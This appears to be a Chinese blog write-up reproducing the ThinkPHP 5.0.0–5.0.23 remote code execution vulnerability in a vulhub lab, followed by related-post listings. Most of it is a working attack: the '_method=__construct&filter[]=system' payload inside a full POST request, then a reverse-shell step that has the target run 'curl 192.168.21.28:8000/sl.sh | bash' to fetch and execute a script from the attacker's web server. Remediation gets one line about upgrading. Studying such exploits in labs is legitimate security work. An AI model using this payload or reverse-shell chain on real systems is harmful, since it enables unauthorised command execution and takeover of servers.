Thinkphp5.0.23远程代码执行漏洞

最新推荐文章于 2024-03-01 00:46:26 发布
最新推荐文章于 2024-03-01 00:46:26 发布
阅读量272 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hovcfuti/article/details/133816454
版权

漏洞简介

Thinkphp5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。

影响版本

Thinkphp 5.0.0~ 5.0.23

漏洞复现

在vulhub里面拉取靶场

访问

可以使用burp suite抓包,也可以使用hackbar浏览器插件,总之可以发post请求包就好

请求文件:

/index.php?s=captcha

请求体:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

hackbar浏览器插件利用

burp suite抓包改包

改为post请求方式

请求包

POST /index.php?s=captcha HTTP/1.1

Host: 192.168.21.31:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 80

Origin: http://192.168.21.31:8080

Connection: close

Referer: http://192.168.21.31:8080/index.php?s=captcha

Upgrade-Insecure-Requests: 1

_method=__construct&filter%5B%5D=system&method=get&server%5BREQUEST_METHOD%5D=ls

反弹shell

在一个文件中写好反弹shell命令

使用python命令在此文件目录开一个web服务

使用python搭建web服务,使用下面俩个哪个都行,此处使用python3,看自己的python环境

# python2

python -m SimpleHTTPServer 8086(8086为web服务端口)

# python3

python3 -m http.server

访问一下确定开启成功

开启监听端口

按照之前的方式发送命令

curl 192.168.21.28:8000/sl.sh | bash

成功反弹

漏洞修复

升级到最新版本(如果是在5.0.0——5.0.23之间的)

白鲨6
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
thinkphp v5.0.23 rce
qq_43647462的博客
08-23 3475
thinkphp v5.0.23 rce 复现 Buchiyexiao. thinkphp是一个轻量级的框架,其中在thinkphp5版本中出现了很多命令执行漏洞,本文分析采用的代码使用的是thinkphp版本v5.0.23(目的是匹配docker搭建的thinkphp环境的版本) 漏洞位置 thinkphp5的主要漏洞位置位于处理请求的Request类中,其中存在method方法,简单阅读发现该方法目的是为了获取当前的请求类型,因为我没有传入任何请求,所以get,post等的数组为空 其中var
ThinkPHP5 5.0.23ThinkPHP5 5.0.22/5.1.29漏洞复现
weixin_48739941的博客
07-10 1554
ThinkPHP5漏洞复现
Thinkphp框架漏洞--->5.0.23 RCE
最新发布
huohaowen的博客
03-01 1295
本篇文章来讲一下thinkphp的框架漏洞
ThinkPHP5 5.0.23 远程执行代码,2.x 任意代码执行,5 5.0.22/5.1.29 远程执行代码
m0_67284865的博客
08-16 251
ThinkPHP5 5.0.23 远程执行代码,2.x 任意代码执行,5 5.0.22/5.1.29 远程执行代码
网络安全深入学习第二课——热门框架漏洞(RCE—Thinkphp5.0.23 代码执行
p36273的博客
09-16 1219
简言之,别人帮你建好了房子但尚未装修,你需要在别人设计好的户型里去装修,省去你搬砖的重复性操作。------ ThinkPHP发展至今,核心版本主要有以下几个系列,ThinkPHP 2系列、ThinkPHP 3系列、ThinkPHP 5系列、ThinkPHP 6系列,各个系列之间在代码实现及功能方面,有较大区别。其中ThinkPHP 2以及ThinkPHP 3系列已经停止维护,ThinkPHP 5系列现使用最多,而ThinkPHP 3系列也积累了较多的历史用户。
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2352
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
vulhub thinkphp5 5.0.23 远程代码执行漏洞
weixin_53696027的博客
03-15 709
vulhub thinkphp5 5.0.23 远程代码执行漏洞
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
m0_52701599的博客
03-17 2786
ThinkPHP5 5.0.23远程代码执行漏洞+webshell工具连接(复现详细过程)
ThinkPHP5 5.0.23 远程代码执行漏洞复现
weixin_54786196的博客
09-01 392
是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。至此 ThinkPHP5 5.0.23 远程代码执行漏洞 复现成功。id是我们执行的命令,可更换我们需要的命令。5.0.23和5.1.31之前的所有版本。改变传参方式 GET改为POST。访问靶机ip+端口号8080。使用burp抓到首页的包。
ThinkPHP5系列远程代码执行漏洞复现(详细)
weixin_53730939的博客
03-20 7430
ThinkPHP5系列远程代码执行漏洞复现(详细)
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
thinkphp5远程执行代码漏洞修复补丁.zip
04-17
thinkphp5远程执行代码漏洞修复补丁
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
10-25
主要介绍了ThinkPHP框架任意代码执行漏洞的利用及其修复方法,该漏洞的修复对于广大使用ThinkPHP的开发人员来说尤为重要!需要的朋友可以参考下
thinkphp5.0.23命令执行-靶场复现
m0_66376444的博客
04-19 943
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。在大于5.0.21小于等于5.0.23的情况下,由于修改了method函数的逻辑,无法随意用变量,这里统一用只能用get[],route[]。命令执行成功,可以看出是windows,所以我用nc来拿shell。本次测试版本:thinkphp5.0.23。三、thinkphp总述。
Thinkphp5.0.23远程命令执行
Cover-3321的博客
01-03 1759
thinkphp远程命令执行漏洞 php的一个开发框架,5,0.23及以前的版本中,获取method的方法中没有正确处理方法 名,导致攻击者可以调用request类任意方法,构造payload,导致远程命令执行
thinkphp5.0.23
weixin_51558394的博客
08-17 1653
thinkphp 5.0.23远程代码执行
ThinkPHP5.0.23 远程代码执行漏洞
夜星空如海的博客
09-30 1815
ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞的复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值